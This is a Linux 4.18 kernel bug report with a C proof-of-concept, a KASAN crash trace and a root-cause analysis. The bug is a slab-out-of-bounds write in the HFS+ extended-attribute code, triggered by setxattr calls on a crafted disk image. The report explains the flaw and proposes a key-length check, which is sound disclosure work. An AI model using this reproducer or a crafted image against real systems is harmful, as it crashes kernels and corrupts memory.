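/*
 * Created attachment 276895 [details]
 * The (compressed) crafted image which causes crash
 *
 * Reproduce (4.18):
 *   # mkdir mnt
 *   # mount -t hfsplus 8.img mnt
 *   # gcc -o poc poc.c
 *   # ./poc ./mnt
 *
 * (In the kernel trace below the reproducer ran as "a.out" rather than
 * "poc"; the steps are otherwise identical.)
 *
 * POC (poc.c)
 *
 * Reproducer for a slab-out-of-bounds write in fs/hfsplus when extended
 * attributes are modified on a crafted HFS+ image.  The trace was taken in
 * the setxattr(2) path (hfsplus_create_attr -> hfsplus_brec_insert ->
 * hfsplus_bnode_read_key), and the user-space register dump (ORIG_RAX 0xbc =
 * setxattr, R8 = 1 = XATTR_CREATE) indicates it is the XATTR_CREATE call
 * that crashes.  The mount must be writable (the trace shows
 * __mnt_want_write being taken).  The xattr calls are issued for their
 * kernel-side effect only; their userland results are logged but do not
 * matter for the reproduction.  Anyone who can get a crafted image mounted
 * (removable media, automount/udisks) can trigger this, so it should be
 * treated as a kernel memory-corruption bug, not merely a local crash.
 */
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>
#include <dirent.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <linux/falloc.h>
#include <linux/loop.h>

/*
 * Build "<mpoint>/foo/bar/xattr", the path of the target file inside the
 * mounted crafted image.  Returns a malloc'd string the caller must free,
 * or NULL if allocation fails.
 */
static char *build_xattr_path(const char *mpoint)
{
    static const char suffix[] = "/foo/bar/xattr";
    /* sizeof(suffix) already counts the terminating NUL. */
    size_t need = strlen(mpoint) + sizeof(suffix);
    char *path = malloc(need);

    if (path == NULL)
        return NULL;
    snprintf(path, need, "%s%s", mpoint, suffix);
    return path;
}

/* Log a failed xattr call to stderr; the reproducer continues regardless. */
static void report(const char *what, ssize_t rc)
{
    if (rc < 0)
        fprintf(stderr, "%s: %s\n", what, strerror(errno));
}

/*
 * Replay the xattr sequence that crashes the kernel on the crafted image.
 * The order (list, remove, create, replace) and the 113-byte value are kept
 * exactly as in the original report.
 *
 * mpoint: the directory where the crafted image is mounted.
 */
static void activity(char *mpoint)
{
    char *xattr = build_xattr_path(mpoint);
    char buf2[113];

    if (xattr == NULL) {
        perror("malloc");
        return;
    }
    memset(buf2, 0, sizeof(buf2));

    report("listxattr", listxattr(xattr, buf2, sizeof(buf2)));
    report("removexattr", removexattr(xattr, "user.mime_type"));
    report("setxattr(XATTR_CREATE)",
           setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_CREATE));
    report("setxattr(XATTR_REPLACE)",
           setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_REPLACE));

    free(xattr);
}

/* Usage: poc <hfsplus-mount-point>.  Exits 1 if the mount point is missing. */
int main(int argc, char *argv[])
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s <hfsplus mount point>\n", argv[0]);
        return 1;
    }
    activity(argv[1]);
    return 0;
}

/*
 * Kernel message
 *
 * [ 925.089898] hfsplus: request for non-existent node 5888 in B*Tree
 * [ 925.091299] hfsplus: request for non-existent node 5888 in B*Tree
 * [ 925.092783] ==================================================================
 * [ 925.094367] BUG: KASAN: slab-out-of-bounds in hfsplus_bnode_read+0xb1/0x140
 * [ 925.095783] Write of size 3922 at addr ffff8801eff06400 by task a.out/1421
 * [ 925.097521] CPU: 0 PID: 1421 Comm: a.out Not tainted 4.18.0-rc1+ #6
 * [ 925.097529] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
 * [ 925.097535] Call Trace:
 * [ 925.097573] dump_stack+0x7b/0xb5
 * [ 925.097610] print_address_description+0x70/0x290
 * [ 925.097616] kasan_report+0x291/0x390
 * [ 925.097620] ? hfsplus_bnode_read+0xb1/0x140
 * [ 925.097637] check_memory_region+0x139/0x190
 * [ 925.097641] memcpy+0x37/0x50
 * [ 925.097646] hfsplus_bnode_read+0xb1/0x140
 * [ 925.097652] hfsplus_bnode_read_key+0xfb/0x140
 * [ 925.097657] ?
 */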
hfsplus_bnode_read_u8+0xa0/0xa0 [ 925.097679] ? set_page_dirty+0x9c/0x120 [ 925.097685] ? hfsplus_bnode_write+0xc2/0x170 [ 925.097690] hfsplus_brec_insert+0x3e2/0x6c0 [ 925.097696] ? hfsplus_brec_keylen+0x130/0x130 [ 925.097701] ? __kmalloc+0x11f/0x240 [ 925.097707] hfsplus_create_attr+0x263/0x2b0 [ 925.097712] ? hfsplus_attr_exists+0x140/0x140 [ 925.097720] ? strncmp+0x3d/0xc0 [ 925.097725] __hfsplus_setxattr+0x2d5/0x1160 [ 925.097757] ? unwind_get_return_address+0x36/0x50 [ 925.097763] ? kasan_check_write+0x14/0x20 [ 925.097790] ? _raw_spin_lock_irqsave+0x2a/0x60 [ 925.097797] ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280 [ 925.097802] ? save_stack+0x46/0xd0 [ 925.097805] ? kasan_kmalloc+0xad/0xe0 [ 925.097809] ? kmem_cache_alloc_trace+0x102/0x200 [ 925.097814] ? hfsplus_setxattr+0x4c/0xb0 [ 925.097818] ? hfsplus_user_setxattr+0x27/0x30 [ 925.097831] ? __vfs_setxattr+0x7c/0xa0 [ 925.097835] ? __vfs_setxattr_noperm+0x8d/0x200 [ 925.097839] ? vfs_setxattr+0xb3/0xc0 [ 925.097846] ? setxattr+0x1b3/0x260 [ 925.097851] ? path_setxattr+0x134/0x170 [ 925.097855] ? __x64_sys_setxattr+0x6d/0x80 [ 925.097869] ? do_syscall_64+0x78/0x170 [ 925.097874] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 925.097879] ? save_stack+0xb5/0xd0 [ 925.097883] ? save_stack+0x46/0xd0 [ 925.097886] ? kasan_kmalloc+0xad/0xe0 [ 925.097890] ? __kmalloc_node+0x11e/0x2e0 [ 925.097903] ? kvmalloc_node+0x31/0x80 [ 925.097907] ? setxattr+0x114/0x260 [ 925.097911] ? path_setxattr+0x134/0x170 [ 925.097914] ? __x64_sys_setxattr+0x6d/0x80 [ 925.097918] ? do_syscall_64+0x78/0x170 [ 925.097923] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 925.097926] ? save_stack+0xb5/0xd0 [ 925.097930] ? save_stack+0x46/0xd0 [ 925.097933] ? __kasan_slab_free+0x13c/0x1a0 [ 925.097936] ? kasan_slab_free+0xe/0x10 [ 925.097940] ? kmem_cache_free+0x89/0x1e0 [ 925.097949] ? putname+0x80/0x90 [ 925.097953] ? filename_lookup+0x191/0x280 [ 925.097957] ? kasan_unpoison_shadow+0x36/0x50 [ 925.097961] ? 
kasan_kmalloc+0xad/0xe0 [ 925.097966] ? kmem_cache_alloc_trace+0x102/0x200 [ 925.097972] hfsplus_setxattr+0x8a/0xb0 [ 925.097976] hfsplus_user_setxattr+0x27/0x30 [ 925.097980] __vfs_setxattr+0x7c/0xa0 [ 925.097985] __vfs_setxattr_noperm+0x8d/0x200 [ 925.097989] vfs_setxattr+0xb3/0xc0 [ 925.097994] setxattr+0x1b3/0x260 [ 925.097998] ? vfs_setxattr+0xc0/0xc0 [ 925.098001] ? filename_lookup+0x191/0x280 [ 925.098005] ? filename_parentat+0x2b0/0x2b0 [ 925.098010] ? kasan_kmalloc+0xad/0xe0 [ 925.098015] ? kasan_check_write+0x14/0x20 [ 925.098039] ? strncpy_from_user+0xa8/0x1c0 [ 925.098052] ? __mnt_is_readonly.part.13+0x23/0x30 [ 925.098057] ? __mnt_want_write+0x9d/0xb0 [ 925.098062] path_setxattr+0x134/0x170 [ 925.098066] ? setxattr+0x260/0x260 [ 925.098076] ? vm_brk+0x20/0x20 [ 925.098081] __x64_sys_setxattr+0x6d/0x80 [ 925.098086] do_syscall_64+0x78/0x170 [ 925.098091] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 925.098114] RIP: 0033:0x7f5b520391fa [ 925.098115] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48 [ 925.098177] RSP: 002b:00007ffcadce8fb8 EFLAGS: 00000206 ORIG_RAX: 00000000000000bc [ 925.098186] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f5b520391fa [ 925.098189] RDX: 00007ffcadce8fe0 RSI: 00000000004008a4 RDI: 0000000001e1b080 [ 925.098191] RBP: 00007ffcadce9060 R08: 0000000000000001 R09: 0000000000000000 [ 925.098194] R10: 0000000000000071 R11: 0000000000000206 R12: 00000000004005e0 [ 925.098196] R13: 00007ffcadce9160 R14: 0000000000000000 R15: 0000000000000000 [ 925.098546] Allocated by task 1421: [ 925.099280] save_stack+0x46/0xd0 [ 925.099284] kasan_kmalloc+0xad/0xe0 [ 925.099288] __kmalloc+0x11f/0x240 [ 925.099292] hfsplus_find_init+0x54/0xc0 [ 925.099296] hfsplus_create_attr+0x10c/0x2b0 [ 925.099300] __hfsplus_setxattr+0x2d5/0x1160 [ 925.099304] hfsplus_setxattr+0x8a/0xb0 [ 925.099308] 
hfsplus_user_setxattr+0x27/0x30 [ 925.099311] __vfs_setxattr+0x7c/0xa0 [ 925.099314] __vfs_setxattr_noperm+0x8d/0x200 [ 925.099318] vfs_setxattr+0xb3/0xc0 [ 925.099321] setxattr+0x1b3/0x260 [ 925.099324] path_setxattr+0x134/0x170 [ 925.099327] __x64_sys_setxattr+0x6d/0x80 [ 925.099331] do_syscall_64+0x78/0x170 [ 925.099336] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 925.099671] Freed by task 0: [ 925.100274] (stack is not available) [ 925.101346] The buggy address belongs to the object at ffff8801eff06400 which belongs to the cache kmalloc-1024 of size 1024 [ 925.103925] The buggy address is located 0 bytes inside of 1024-byte region [ffff8801eff06400, ffff8801eff06800) [ 925.106280] The buggy address belongs to the page: [ 925.107281] page:ffffea0007bfc100 count:1 mapcount:0 mapping:ffff8801f6802c40 index:0x0 compound_mapcount: 0 [ 925.109289] flags: 0x2ffff0000008100(slab|head) [ 925.110247] raw: 02ffff0000008100 dead000000000100 dead000000000200 ffff8801f6802c40 [ 925.111811] raw: 0000000000000000 00000000800e000e 00000001ffffffff 0000000000000000 [ 925.113374] page dumped because: kasan: bad access detected [ 925.114846] Memory state around the buggy address: [ 925.115822] ffff8801eff06500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 925.117269] ffff8801eff06580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 925.118738] >ffff8801eff06600: 00 00 00 fc fc fc fc fc fc fc fc fc fc fc fc fc [ 925.120199] ^ [ 925.121025] ffff8801eff06680: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc [ 925.122497] ffff8801eff06700: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc [ 925.123955] ================================================================== [ 925.125422] Disabling lock debugging due to kernel taint [ 925.125610] general protection fault: 0000 [#1] SMP KASAN PTI [ 925.126835] CPU: 0 PID: 1421 Comm: a.out Tainted: G B 4.18.0-rc1+ #6 [ 925.128393] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 925.130438] RIP: 
0010:__memcpy+0x12/0x20 [ 925.131255] Code: 5b 41 5c 41 5d 5d c3 48 89 df e8 59 f6 ff ff eb c9 90 90 90 90 90 90 90 66 66 90 66 90 48 89 f8 48 89 d1 48 c1 e9 03 83 e2 07 <f3> 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8 48 89 d1 f3 a4 [ 925.135067] RSP: 0018:ffff8801dfbff490 EFLAGS: 00010246 [ 925.136131] RAX: ffff8801eff08352 RBX: 0000000000001000 RCX: 0000000000000200 [ 925.137577] RDX: 0000000000000000 RSI: 580556c000016000 RDI: ffff8801eff08352 [ 925.139034] RBP: ffff8801dfbff4b0 R08: 0000000000000006 R09: ffffed003dfe106a [ 925.140478] R10: 0000000000000006 R11: ffffed003dfe126a R12: ffff8801eff08352 [ 925.141925] R13: 580556c000016000 R14: ffff8801eff08352 R15: 000000000000d7b0 [ 925.143365] FS: 00007f5b52518700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000 [ 925.144989] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 925.146163] CR2: 0000000001e1b008 CR3: 00000001deb04000 CR4: 00000000000006f0 [ 925.147611] Call Trace: [ 925.148133] ? memcpy+0x45/0x50 [ 925.148788] hfsplus_bnode_read+0x129/0x140 [ 925.149650] hfsplus_bnode_read_key+0xfb/0x140 [ 925.157205] ? hfsplus_bnode_read_u8+0xa0/0xa0 [ 925.158142] ? set_page_dirty+0x9c/0x120 [ 925.158961] ? hfsplus_bnode_write+0xc2/0x170 [ 925.159868] hfsplus_brec_insert+0x3e2/0x6c0 [ 925.160755] ? hfsplus_brec_keylen+0x130/0x130 [ 925.161676] ? __kmalloc+0x11f/0x240 [ 925.162433] hfsplus_create_attr+0x263/0x2b0 [ 925.163319] ? hfsplus_attr_exists+0x140/0x140 [ 925.164238] ? strncmp+0x3d/0xc0 [ 925.164914] __hfsplus_setxattr+0x2d5/0x1160 [ 925.165806] ? unwind_get_return_address+0x36/0x50 [ 925.166795] ? kasan_check_write+0x14/0x20 [ 925.167645] ? _raw_spin_lock_irqsave+0x2a/0x60 [ 925.168579] ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280 [ 925.169784] ? save_stack+0x46/0xd0 [ 925.170515] ? kasan_kmalloc+0xad/0xe0 [ 925.171299] ? kmem_cache_alloc_trace+0x102/0x200 [ 925.172273] ? hfsplus_setxattr+0x4c/0xb0 [ 925.173107] ? hfsplus_user_setxattr+0x27/0x30 [ 925.174035] ? 
__vfs_setxattr+0x7c/0xa0 [ 925.174831] ? __vfs_setxattr_noperm+0x8d/0x200 [ 925.175766] ? vfs_setxattr+0xb3/0xc0 [ 925.176529] ? setxattr+0x1b3/0x260 [ 925.177256] ? path_setxattr+0x134/0x170 [ 925.178081] ? __x64_sys_setxattr+0x6d/0x80 [ 925.178950] ? do_syscall_64+0x78/0x170 [ 925.179751] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 925.180824] ? save_stack+0xb5/0xd0 [ 925.181552] ? save_stack+0x46/0xd0 [ 925.182292] ? kasan_kmalloc+0xad/0xe0 [ 925.183074] ? __kmalloc_node+0x11e/0x2e0 [ 925.183906] ? kvmalloc_node+0x31/0x80 [ 925.184688] ? setxattr+0x114/0x260 [ 925.185418] ? path_setxattr+0x134/0x170 [ 925.186244] ? __x64_sys_setxattr+0x6d/0x80 [ 925.187120] ? do_syscall_64+0x78/0x170 [ 925.187922] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 925.188996] ? save_stack+0xb5/0xd0 [ 925.189728] ? save_stack+0x46/0xd0 [ 925.190471] ? __kasan_slab_free+0x13c/0x1a0 [ 925.191349] ? kasan_slab_free+0xe/0x10 [ 925.192147] ? kmem_cache_free+0x89/0x1e0 [ 925.192978] ? putname+0x80/0x90 [ 925.193654] ? filename_lookup+0x191/0x280 [ 925.194515] ? kasan_unpoison_shadow+0x36/0x50 [ 925.195436] ? kasan_kmalloc+0xad/0xe0 [ 925.196221] ? kmem_cache_alloc_trace+0x102/0x200 [ 925.197194] hfsplus_setxattr+0x8a/0xb0 [ 925.198005] hfsplus_user_setxattr+0x27/0x30 [ 925.198892] __vfs_setxattr+0x7c/0xa0 [ 925.199659] __vfs_setxattr_noperm+0x8d/0x200 [ 925.200560] vfs_setxattr+0xb3/0xc0 [ 925.201294] setxattr+0x1b3/0x260 [ 925.202003] ? vfs_setxattr+0xc0/0xc0 [ 925.202769] ? filename_lookup+0x191/0x280 [ 925.203621] ? filename_parentat+0x2b0/0x2b0 [ 925.204509] ? kasan_kmalloc+0xad/0xe0 [ 925.205295] ? kasan_check_write+0x14/0x20 [ 925.206161] ? strncpy_from_user+0xa8/0x1c0 [ 925.207033] ? __mnt_is_readonly.part.13+0x23/0x30 [ 925.208023] ? __mnt_want_write+0x9d/0xb0 [ 925.208856] path_setxattr+0x134/0x170 [ 925.209636] ? setxattr+0x260/0x260 [ 925.210376] ? 
vm_brk+0x20/0x20 [ 925.211038] __x64_sys_setxattr+0x6d/0x80 [ 925.211877] do_syscall_64+0x78/0x170 [ 925.212644] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 925.213683] RIP: 0033:0x7f5b520391fa [ 925.214436] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48 [ 925.218313] RSP: 002b:00007ffcadce8fb8 EFLAGS: 00000206 ORIG_RAX: 00000000000000bc [ 925.219855] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f5b520391fa [ 925.221306] RDX: 00007ffcadce8fe0 RSI: 00000000004008a4 RDI: 0000000001e1b080 [ 925.222769] RBP: 00007ffcadce9060 R08: 0000000000000001 R09: 0000000000000000 [ 925.224223] R10: 0000000000000071 R11: 0000000000000206 R12: 00000000004005e0 [ 925.225672] R13: 00007ffcadce9160 R14: 0000000000000000 R15: 0000000000000000 [ 925.227149] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd i2c_piix4 mac_hid soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper syscopyarea sysfillrect sysimgblt fb_sys_fops crct10dif_pclmul ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy [ 925.237067] ---[ end trace 7f5a46c7478f1295 ]--- [ 925.238062] RIP: 0010:__memcpy+0x12/0x20 [ 925.238907] Code: 5b 41 5c 41 5d 5d c3 48 89 df e8 59 f6 ff ff eb c9 90 90 90 90 90 90 90 66 66 90 66 90 48 89 f8 48 89 d1 48 c1 e9 03 83 e2 07 <f3> 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8 48 89 d1 f3 a4 [ 925.242813] RSP: 0018:ffff8801dfbff490 EFLAGS: 00010246 [ 925.243896] RAX: ffff8801eff08352 RBX: 0000000000001000 RCX: 0000000000000200 [ 925.245328] RDX: 0000000000000000 RSI: 580556c000016000 RDI: ffff8801eff08352 [ 925.246855] RBP: ffff8801dfbff4b0 R08: 
0000000000000006 R09: ffffed003dfe106a [ 925.248305] R10: 0000000000000006 R11: ffffed003dfe126a R12: ffff8801eff08352 [ 925.249743] R13: 580556c000016000 R14: ffff8801eff08352 R15: 000000000000d7b0 [ 925.251254] FS: 00007f5b52518700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000 [ 925.252904] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 925.254085] CR2: 0000000001e1b008 CR3: 00000001deb04000 CR4: 00000000000006f0

- Location https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/hfsplus/bnode.c#L38

    while ((len -= l) != 0) {
        buf += l;
        l = min_t(int, len, PAGE_SIZE);
        memcpy(buf, kmap(*++pagep), l);
        kunmap(*pagep);
    }

OOB happens in this memcpy() as KASAN reports. Note that this loop is where the overflow lands, not where it originates: `buf` is the key buffer that hfsplus_find_init() allocated (the KASAN allocation trace shows it came from the kmalloc-1024 slab), while the copy length (a 3922-byte write here) is chosen by the caller, hfsplus_bnode_read_key() invoked from hfsplus_brec_insert(), which presumably takes the key length from the on-disk record rather than from the tree's maximum key length that the buffer was sized for. A crafted attributes B-tree node can therefore declare a key longer than the buffer. The follow-on general protection fault in __memcpy with a wild source pointer (RSI/R13 = 580556c000016000) is consistent with `*++pagep` also running past the node's page array once len exceeds the node size, so the source side of the copy appears unbounded as well. The fix belongs where the length is decided: validate the record's key length against the tree's maximum key length (and the space remaining in the node) before hfsplus_bnode_read() is called, and fail the operation (e.g. with -EIO) instead of copying. The two "request for non-existent node 5888 in B*Tree" messages just before the report show the image's B-tree links are already inconsistent, i.e. the image is untrusted input and every length and node number read from it needs a bounds check. Reported by Wen Xu (wen.xu@gatech.edu) from SSLab at Gatech.